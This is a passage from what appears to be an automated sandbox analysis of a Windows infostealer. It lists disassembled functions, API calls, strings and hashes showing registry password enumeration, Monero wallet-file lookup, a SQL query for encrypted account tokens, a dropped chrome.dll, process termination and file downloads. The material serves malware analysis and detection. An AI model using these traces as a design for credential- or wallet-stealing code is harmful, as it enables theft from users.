                                        • Part of subcall function 00AC7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AC7411
                                        • Part of subcall function 00AC7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AC746D
                                        • Part of subcall function 00AC7330: GetProcessHeap.KERNEL32(00000000,?), ref: 00AC74B2
                                        • Part of subcall function 00AC7330: HeapFree.KERNEL32(00000000), ref: 00AC74B9
                                      • lstrcat.KERNEL32(00000000,00AE192C), ref: 00AC7666
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00AC76A8
                                      • lstrcat.KERNEL32(00000000, : ), ref: 00AC76BA
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00AC76EF
                                      • lstrcat.KERNEL32(00000000,00AE1934), ref: 00AC7700
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00AC7733
                                      • lstrcat.KERNEL32(00000000,00AE1938), ref: 00AC774D
                                      • task.LIBCPMTD ref: 00AC775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: :
                                      • API String ID: 3191641157-3653984579
                                      • Opcode ID: 525cf9f91df5948945485db21448665d0484d1f45e5d874e165a67f8b4d35a7a
                                      • Instruction ID: 39a6598e7c7c2869a86179a7c4157672978ebe92070f32276a6d44890e519737
                                      • Opcode Fuzzy Hash: 525cf9f91df5948945485db21448665d0484d1f45e5d874e165a67f8b4d35a7a
                                      • Instruction Fuzzy Hash: D4316E71924208EFDB04EBA0DD96EFE7379BB44301F104209F106A73A1DA34A946CB64
                                      Function 00AC7330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00AC7374
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AC739A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AC7411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AC746D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00AC74B2
                                      • HeapFree.KERNEL32(00000000), ref: 00AC74B9
                                      • task.LIBCPMTD ref: 00AC75B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: Password
                                      • API String ID: 2808661185-3434357891
                                      • Opcode ID: 8e34959e09830d4b5ba944b5ae35932e176e5f36f7f2f194d801130732771afa
                                      • Instruction ID: 887917dd278b5315ac565dd7c505c274baa601aaf6a035451d9d1c3e038d09c8
                                      • Opcode Fuzzy Hash: 8e34959e09830d4b5ba944b5ae35932e176e5f36f7f2f194d801130732771afa
                                      • Instruction Fuzzy Hash: 4361FAB591426C9BDB24DB50CD55FDAB7B8BF54300F0081E9E689A6241DFB06BC9CFA0
                                      Function 00AD8290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0154F218,00000000,?,00AE0E14,00000000,?,00000000), ref: 00AD82C0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD82C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00AD82E8
                                      • __aulldiv.LIBCMT ref: 00AD8302
                                      • __aulldiv.LIBCMT ref: 00AD8310
                                      • wsprintfA.USER32 ref: 00AD833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: 1de84fcb86f98f107008adbea511ec7cebdf667a64bd3b66b5fda8a2c6f27846
                                      • Instruction ID: d0202eb5a022f8c7dd2993d92f3d7667b938518d5f6f40a25394fd72ee33c513
                                      • Opcode Fuzzy Hash: 1de84fcb86f98f107008adbea511ec7cebdf667a64bd3b66b5fda8a2c6f27846
                                      • Instruction Fuzzy Hash: 642108B1E54318ABDB00DFD4CD4AFAEB7B9FB44B14F10450AF619BB280C77859008BA5
                                      Function 00AC9E30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 163stringsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                      • wsprintfA.USER32 ref: 00AC9E7F
                                      • memset.MSVCRT ref: 00AC9EED
                                      • lstrcat.KERNEL32(00000000,?), ref: 00AC9F03
                                      • lstrcat.KERNEL32(00000000,?), ref: 00AC9F17
                                      • lstrcat.KERNEL32(00000000,00AE12D8), ref: 00AC9F29
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00AC9F7C
                                      • memset.MSVCRT ref: 00AC9F9C
                                      • Sleep.KERNEL32(00001388), ref: 00ACA013
                                        • Part of subcall function 00AD99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD99C5
                                        • Part of subcall function 00AD99A0: Process32First.KERNEL32(00ACA056,00000128), ref: 00AD99D9
                                        • Part of subcall function 00AD99A0: Process32Next.KERNEL32(00ACA056,00000128), ref: 00AD99F2
                                        • Part of subcall function 00AD99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AD9A4E
                                        • Part of subcall function 00AD99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00AD9A6C
                                        • Part of subcall function 00AD99A0: CloseHandle.KERNEL32(00000000), ref: 00AD9A79
                                        • Part of subcall function 00AD99A0: CloseHandle.KERNEL32(00ACA056), ref: 00AD9A88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 3242155833-2746444292
                                      • Opcode ID: 261368649b438f546c291b109ad454e60b1ce91e051d95f688bc1277936fe418
                                      • Instruction ID: bdbd9588d7b0cfa6fdf5016c88030cde669ce2427bb4956e0fdc9212827580ff
                                      • Opcode Fuzzy Hash: 261368649b438f546c291b109ad454e60b1ce91e051d95f688bc1277936fe418
                                      • Instruction Fuzzy Hash: A251A7B1954318ABEB24DB60DC4AFDA7378AF48700F004599F60DAB2C1EB75AB84CF55
                                      Function 00AC60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AC4889
                                        • Part of subcall function 00AC4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AC4899
                                      • InternetOpenA.WININET(00AE0DFB,00000001,00000000,00000000,00000000), ref: 00AC615F
                                      • StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC6197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00AC61DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00AC6203
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00AC622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AC625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00AC6299
                                      • InternetCloseHandle.WININET(?), ref: 00AC62A3
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC62B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: 8744fb105df56eebea0508224a86c4e50be51fbe92058ac2f84c3f4ec1c8fe40
                                      • Instruction ID: c40e7959e2ea729f9a2870b531f948fe9cbba673873cdf01668ba331ce2bf6ca
                                      • Opcode Fuzzy Hash: 8744fb105df56eebea0508224a86c4e50be51fbe92058ac2f84c3f4ec1c8fe40
                                      • Instruction Fuzzy Hash: B85151B1A10318ABDB20DF90DD45FEE7779AB44301F108199F605B72C1DB74AA89CFA5
                                      Function 00B4012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 00B4024D
                                      • ___TypeMatch.LIBVCRUNTIME ref: 00B4035B
                                      • CatchIt.LIBVCRUNTIME ref: 00B403AC
                                      • CallUnexpected.LIBVCRUNTIME ref: 00B404C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: 1d12612675d9bfcee877bc0127a54278b82f90eab9b0226adfa10477316158d2
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: 1AB17971C20209EFCF15EFA8C8859AEBBF5FF14310F1441AAEA116B252D370DA51EB91
                                      Function 00ACBA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                      • lstrlen.KERNEL32(00000000), ref: 00ACBC6F
                                        • Part of subcall function 00AD8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AD8FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00ACBC9D
                                      • lstrlen.KERNEL32(00000000), ref: 00ACBD75
                                      • lstrlen.KERNEL32(00000000), ref: 00ACBD89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: bf2447e58fa57532e7c71acb2409a5ccc90cf9f3c9b59a430639ab51a81510bf
                                      • Instruction ID: 115b3c4a981cc4d5bdce20363aaa878c8ae2881732df0189caee9a99b38469c4
                                      • Opcode Fuzzy Hash: bf2447e58fa57532e7c71acb2409a5ccc90cf9f3c9b59a430639ab51a81510bf
                                      • Instruction Fuzzy Hash: 19B10572920118ABCF14FBA0DE66EEE7339AF64300F40455AF54766291EF346E49CB72
                                      Function 00AD6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: ec4f7e6aa01c9627c98919c7db88bbc6a476d5c7c1b76771691759f0bc1782d2
                                      • Instruction ID: 84ed8213786bd071399c7dc078fce3f8fd09e087b3cebc39827c21fcbc22ae5e
                                      • Opcode Fuzzy Hash: ec4f7e6aa01c9627c98919c7db88bbc6a476d5c7c1b76771691759f0bc1782d2
                                      • Instruction Fuzzy Hash: EDF05E30A1C309EFD3449FE0EA0979CBB30EB04747F114197F64AE62A0C6704A409B65
                                      Function 00AD08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00AD9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00AD08DC,C:\ProgramData\chrome.dll), ref: 00AD9871
                                        • Part of subcall function 00ACA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00ACA098
                                      • StrCmpCA.SHLWAPI(00000000,01548BD8), ref: 00AD0922
                                      • StrCmpCA.SHLWAPI(00000000,01548B38), ref: 00AD0B79
                                      • StrCmpCA.SHLWAPI(00000000,01548C48), ref: 00AD0A0C
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00AD0C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 00AD0C30
                                      • C:\ProgramData\chrome.dll, xrefs: 00AD08CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
